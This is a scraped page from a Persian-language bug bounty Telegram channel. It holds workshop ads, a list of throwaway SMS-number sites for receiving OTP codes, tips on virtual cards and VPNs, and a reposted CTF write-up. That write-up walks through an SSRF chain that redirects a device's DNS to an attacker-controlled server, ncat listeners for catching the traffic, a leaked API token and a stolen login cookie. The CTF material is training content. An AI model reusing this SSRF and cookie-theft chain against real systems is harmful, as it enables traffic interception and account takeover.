fa
Feedback
Hack Haven

Hack Haven

رفتن به کانال در Telegram

لینک گروه @hackhaven_gap یاد بعضی آدم‌ها هرگز از دل‌ها نمی‌رود... این کانال، یادگارِ پوریاست؛ هر قدمی که در آن برداشته می‌شود، هدیه‌ای است به روح آسمانی‌اش. روحش شاد، یادش جاودان🕊️

نمایش بیشتر
1 312
مشترکین
-124 ساعت
-37 روز
+3130 روز
آرشیو پست ها
دریافت پیامک برای وقتایی که oto کد میخواید این سایت های بعضی هاشون رایگانند SMS-Activate:hero-sms.com 5Sim:5sim.net/zh SMS-Man:sms-man.com Tiger-SMS:tiger-sms.com PingMe:pingme.tel SMSSir:smssir.com OnlineSim:onlinesim.io GlobalSMS:globalsms.io Receive an SMS:receive-a-sms.com SMS Receive free:smsreceivefree.com Online SMS:sms-online.co Receive SMS online:smsreceiveonline.com Get a free SMS number:getfreesmsnumber.com Receive SMS:sms-receive.net Receive SMS Online NET:receivesmsonline.net Free SMS checks:freesmsverifications.com 7 SIM NET:7sim.net HS3X:hs3x.com Receive free SMS:receivefreesms.com Receive free SMS NET:receivefreesms.net Receive SMS Online IN:receivesmsonline.in Receive SMS online:receive-sms-online.com See SMS:smsver.com Groovl:groovl.com SMS.SELLAITE:sms.sellaite.com Send SMS now:sendsmsnow.com Receive SMS online EU:receivesmsonline.eu Proovl:proovl.com/numbers Anon SMS:anon-sms.com Hide my numbers:hidemynumbers.com Pinger:pinger.com Free online phone:freeonlinephone.org Capture SMS:catchsms.com SMS Get:smsget.net 1S2U:1s2u.com Receive SMS:getsms.org Vritty:virtty.com Text anywhere:textanywhere.net Receive SMS online ME:receivesmsonline.me Purchase virtual number:virtualnumberbuy.com Free Receive SMS online:freereceivesmsonline.com NDTAN SMS:sms.ndtan.net SMS Listen:smslisten.com Free virtual SMS number:freevirtualsmsnumber.com SMS Tibo:smstibo.com Receive SMS number:receivesmsnumber.com Free SMS code:freesmscode.com Online SMS numbers:smsnumbersonline.com SMS reception:smsreceiving.com

به یاد پوریای عزیز 🖤💔
به یاد پوریای عزیز 🖤💔

برای دومین بار بنا به درخواست فراوانی که در این چهار سال داشتیم که کارگاه هایی برگزار شود که به صورت تخصصی فقط به یک بخش خاص اشاره شود و کوتاه باشد و دومین کارگاه با یکی دیگر از اسیب پذیری مورد علاقه خودم شروع خواهد شد : Broken access control بی راه نیست اگه بگم 35 درصد کل بانتی دو سال اخیر من با این تایپ حمله بوده 9 مهر:‌ درک این اسیب پذیری به همراه حل مثال ها فراوان 16 مهر:‌ بررسی عمیق این اسیب پذیری از دید تجربه و مثال ها متنوعد 23 مهر:‌ ترکیب اسیب پذیری ها کم ارزش با این اسیب پذیری برای تبدیل گزارش های مختلف به گزارش های کرتیکال 30 مهر:‌ لایو هکینگ و هانتینگ نکته: تقریبا با این تایپ حمله بسیاری از xss های من تبدیل به کرتیکال شد! برای ثبت نام میتوانید از لینک زیر استفاده کنید: https://www.instagram.com/s/aGlnaGxpZ2h0OjE3OTAxODAzNzE4NTg5MDI3?story_media_id=3979547667200320168&stkn=MW15czFmNXd1NmhtMA==

سریال قشنگیه ولی فصل ۴ قراره بیاد منو قفل کرد تمام ۸.۱ از ۱۰ توصیه میکنم ببینیدش
سریال قشنگیه ولی فصل ۴ قراره بیاد منو قفل کرد تمام ۸.۱ از ۱۰ توصیه میکنم ببینیدش

Email Verification API

روش جدید Email Verification API که به تازگی پیاده‌سازی شده و در مرحله تریال هستش و فعلا با جمیل کار میکنه. این یک روش جدید برای وریفای کردن ایمیل بصورت مستقیم از طریق مرورگره. معمولاً سایت از طریق OTP یا مجیک لینک ها استفاده میکنند که این روش برای کاربران گشاد زجر آوره و ممکنه بیخیال ثبت نام در سایت بشن و برن و دیگه برنگردن. به همین اومدن چنین API رو پیاده سازی کردن. برای پیاده سازی این ای پی آی ما چند متاع لازم داریم: - کاربر - مرورگر - ارائه دهنده ایمیل ـ سرور فرآیندش چطوریه؟ - کاربر وارد حساب ایمیلش میشه. ارائه‌دهنده ایمیل، وضعیت ورود کاربر را در میده مرورگر. ـ بعداً کاربر آدرس ایمیلش رو مثلا در فرم سایت شما وارد می‌کنه. ـ مرورگر بررسی می‌کند که آیا این آدرس ایمیل با حسابی که کاربر در فرم ثبت نام وارد کرده مرتبطه یا نه. ـاگر مرتبط باشه، مرورگر و ارائه‌دهنده ایمیل دست به دست هم میدن و Token تولید می‌کنن. ـ این Token به‌صورت خودکار داخل یک فیلد مخفی توی فرم قرار می‌گیره. - بعدش کاربر فرم رو ارسال می‌کنه. ـ سرور شما آدرس ایمیل و Token رو دریافت می‌کنه ـ سرور Token را اعتبارسنجی میکنه. اگر اعتبارسنجی موفق باشه، مشخص می‌شه که کاربر گوزه کدوم کونه. منظورم مشخص میشه که کاربر واقعاً مالک اون ادرس ایمیل هست یا نه. نحوه پیاده سازی و جزییات بیشتر رو اینجا میتونید بخونید. بنظر شما چه سناریو هایی برای کش رفتن توکن از این طریق میشه درآورد؟

Repost from Network Security
S').click(function() {
    var server = $('input[name="dns_server"]').val();
    $.get('/set/dns?server=' + server, function(resp) {
        alert(resp);
    });
});
توی این بخش اگه بتونیم SET/DNS کنترل کنیم میشه گفت عملا میتونیم به ترافیک دسترسی داشته باشیم پس توی این بخش با استفاده از این کد یه dns server راه انداختیم https://gist.githubusercontent.com/pklaus/b5a7876d4d2cf7271873/raw/cb089513b185f4128d956eef6e0fb9f5fd583e41/ddnsserver.py و روی پورت 443 با netcat روی لیستن میزاریم : ncat -lv 443 و توی بخش بعدی این درخواستو ارسال میکنیم:
POST /connection-test HTTP/1.1
Host: 178.62.61.49
...
node=192.168.1.1/set/dns?server=173.230.148.69#
در نتیجه درخواست به سرور ما میومد ولی چون ssl بود و ما گواهیشو نداشتیم یه مشت چرندیاتو میدیدیم و با رفتن به بخش اول که شروع کردیم و یه مقدار گشتن به اینurl میرسیم https://www.googletagmaneger.com/event?include=asdf که یه خطای xdebug به ما نشون داد و خطا نشون دهده LFI بود ولی کاراکتر های @ , / توی بلک لیست بودن و با استفاده از آیپی خود سایت با یه مقدار fuzz به این بخش رسیدیم http://142.93.46.249/datacollection/ssl/ و الان ssl داشتیم و کدی که اون بالا بود اجرا کردیم : python3 dns.py --port 53 –udp و بعد این دستورو به netcat اضافه کردیم: ncat -lv 443 --ssl-cert=/home/CTF/certs/fullchain.pem --ssl-key=/home/CTF/certs/privkey.pem و بعد همون درخواستو تکرار کردیم و تماممم SSRF و ترافیکو گرفتیم و کارو جمع کرد
GET /api/poll HTTP/1.1
Host: www.googletagmaneger.com
User-Agent: curl/7.58.0
Accept: */*
X-Token: 779549E7865D034D9A9DB34401DA2157
بعد هم با یه مقدار fuzz به بخش /api/cookie رسیدیم و با ارسال درخواست به این بخش تونستیم کوکی معتبر رو دریافت کنیم:
HTTP/1.1 200 OK
...
{"description":"Login Cookie","data":"NzQ1NWYxYmJkYzczM2YwYTkzMzg2MjE5MmIxNTFhN2VlNGI0NmQyM2EwYjNlMzBiMzc3NGE2NTVhYzE5MzBiMDE1MWY2NGQ5MzE1ZjJhZmEzY2VlYTcyZDFlNjNmMjQ3YTZhNTQzM2U1ODBjOWIzZGJhYWQyMmNiZTcxYzU5NTA="}
و در نهایت این کوکی برای سایت اول ست میکنیم و flag به دست میاریم. https://buer.haus/2020/06/14/nahamcon-trash-the-cache-write-up-web-1000/

Repost from RadvanSec
سلام دوستان اقا چند وقت پیش داشتم درباره آسیب پذیری open redirect می خوندم. یهو به ذهنم رسید شروع کنم به ساختن lab های لول بن
سلام دوستان اقا چند وقت پیش داشتم درباره آسیب پذیری open redirect می خوندم. یهو به ذهنم رسید شروع کنم به ساختن lab های لول بندی شده (php) که بهتر بتونم این باگو درک کنم. از لول ۱ تا ۱۰ لول بندی کردم از آسان به سخت. و به شما یاد می ده چجوری با استفاده از open redirect به SSRF , XSS , CRLF , OAuth Token theft برسید. تمام level هارو بر اساس چیزای که توی real world بوده طراحی کردم. سورس کد هر لول هم در دسترس هست و حتا راهنما هایی هم وجود داره. دوس داستید یه سر بزنید و علم خودتونو محک بزنید. https://github.com/zoly-zoly/Open-Redirect-Lab

من جدا از بحث بقیه اساتیدی که دوره برگزار می‌کنن، این حرف رو کاملاً از طرف خودم می‌زنم. من خودم تا الان فقط توی یه دوره شرکت
+1
من جدا از بحث بقیه اساتیدی که دوره برگزار می‌کنن، این حرف رو کاملاً از طرف خودم می‌زنم. من خودم تا الان فقط توی یه دوره شرکت کردم و اونم دوره منتورینگ استاد رضا شریف‌زاده بوده. واقعاً جدا از اینکه خود دوره خیلی خوب و کاربردیه، خود رضا هم از نظر پشتیبانی واقعاً عالیه و همیشه سعی می‌کنه کمک کنه. ولی به نظرم یکی از بهترین و خاص‌ترین بخش‌های این دوره، لایو هانت‌های رضاست. واقعاً به نظرم بی‌نظیره. من خودم خیلی از این لایو هانت‌ها استفاده کردم و تجربه‌های خیلی خوبی ازشون به دست آوردم. خود رضا هم واقعاً کارش درسته و چیزی که آموزش می‌ده رو خودش توی عمل انجام می‌ده. من وقتی شروع کردم، واقعاً کسی نبود که درست راهنماییم کنه یا یه مسیر خوب بهم نشون بده. خیلی با سختی و آزمون‌وخطا جلو رفتم تا بالاخره تونستم مسیرم رو پیدا کنم. برای همین این رو می‌ذارم، شاید کسی مثل من اول راه سردرگم باشه و بتونم حداقل یه مسیر خوب بهش معرفی کنم. رضا، واقعاً کارت درسته ❤️ https://t.me/safe_mode01

Repost from N/a
سلام رفقا تصمیم گرفتم که اموزش اسیب پذیری هارو شروع کنم تو سری اول اموزش میریم سراغ اسیب پذیری SQLi با عنوان SQLi 0 to master تو پارت اول رفتیم سراغ پیش نیاز هایی که باید بلد باشیم امید وارم این دوره مفید باشه براتون ❤️ https://youtu.be/ZW6OVWRY5-M

🍿 قدرتمندتر از Fable 5 ولی رایگان! مدل مرموز Ox Alpha

این PoC مربوط به یک CVE در وردپرس است. برای دوستانی که پس از شناسایی CVE نمی‌دانند چگونه باعث آسیب‌پذیری می‌شود، حتماً این ویدیو را مشاهده کنید: https://youtu.be/k3d9UgYyK9o?si=uoTCjB8xcLk07Qe7

https://www.instagram.com/reel/DcmBr6sNDWh/?igsi=dGRkcjd6ZnA2M2pu دیدیش چطور بود؟ پی او سی شو پابلیک کنم اینجا؟ نظرتو کامنت کن زیر خود پست😁❤️

برای اولین بار بنا به درخواست فراوانی که در این چهار سال داشتیم که کارگاه هایی برگذار شود که به صورت تخصصی فقط به یک بخش خاص اشاره شود و کوتاه باشد و اولین کارگاه با اسیب پذیری مورد علاقه خودم شروع خواهد شد : Bypass Authentication بی راه نیست اگه بگم ۳۰ درصد کل بانتی دو سال اخیر من با این تایپ حمله بوده Bypass Authentication 1. 5 شهریور :‌جلسه شروع و درک این اسیب پذیری به همراه حل مثال ها فراوان ۲. ۱۲ شهریور:‌بررسی عمیق این اسیب پذیری از دید تجربه و مثال ها متنوع که منجر به زیروکلیک و وان کلیک اکانت تیک اور خواهد شد ۳. ۱۹ شهریور:‌ استفاده از دانش کسب شده برای کار روی تارگت ها واقعی برای ثبت نام میتوانید از لینک زیر استفاده کنید: https://www.instagram.com/stories/pentesterland/3971393261971578538?utm_source=ig_story_item_share&igsi=NTZpZDU0ZHd4cTY1

ویزا کارت بسازید برای خودتون پرداخت های بین المللی راحت انجام بدید البته یکسری از سایت ها نمیشه

Repost from Matin SenPai
روش پرداخت بین‌المللی و گرفتن Visa Card مجازی خب دوستان، امروز می‌خوام بهتون یاد بدم چطوری می‌تونید با این وبسایت، برای خودتو
+2
روش پرداخت بین‌المللی و گرفتن Visa Card مجازی خب دوستان، امروز می‌خوام بهتون یاد بدم چطوری می‌تونید با این وبسایت، برای خودتون ویزا کارت بگیرید: https://app.mpay.cards?startapp=ref_PzwXZ8 (لینک رفرال هست. می‌تونید آخرش رو پاک کنید اگر دوست نداشتید) 1- بعد از اینکه وارد وبسایت شدید، Next بزنید تا با تصویر اول رو به رو بشید 2- روی Apply بزنید 3- با ایمیلتون لاگین کنید. دقت کنید که تمام هویت کارت‌های اعتباری شما روی این ایمیل هستش 4- بعد از اینکه وارد شدید، با کریپتو 5 دلار پرداخت می‌کنید و کارت برای شما فعال میشه. از USDC و تتر و... هم پشتیبانی می‌کنه. برای آموزش پرداختش با نوبیتکس و...، می‌تونید یوتوب رو بگردید. من خودم با Trust Wallet زدم USDC و مشکلی نبود. 5- تبریک می‌گم، شما Visa card دارید به اسم خودتون! مزایا: - می‌تونید توی تمام سایت‌هایی که نیاز به کارت دارن و رایگان، اعتبار خوبی میدن، ثبت نام کنید(من توی Nous Research پلن free رو فعال کردم) - می‌تونید برای OpenCode و سرویس‌های بین‌المللی، با شارژ کردنش پرداخت داشته باشید(کلاد رو هنوز امتحان نکردم) - و تمام چیزهایی که سالها از ما گرفته شده و ازش محروم بودیم. - ایرانیکارت و سایت‌های مشابه، با مبلغ‌های فضایی و میلیونی فعال می‌کنن همین رو. و به نظرم 5 دلار، منصفانه‌ست معایب: - برای واریز به حساب، باید اول 25 دلار شارژ کنید اکانت رو و بعدش می‌تونید به کارت منتقل کنید. تنها محدودیتی که بهش خوردم همین بود ✉️ t.me/MatinSenPaii

برید برای خودتون vpn رایگان بسازید از اینور اونور نگیرید

Repost from Matin SenPai
لینک داشبورد کلودفلر: dash.cloudflare.com لینک ویزارد تحت وب BPB جهت راه‌اندازی: https://wizard.bpb-panel.workers.dev/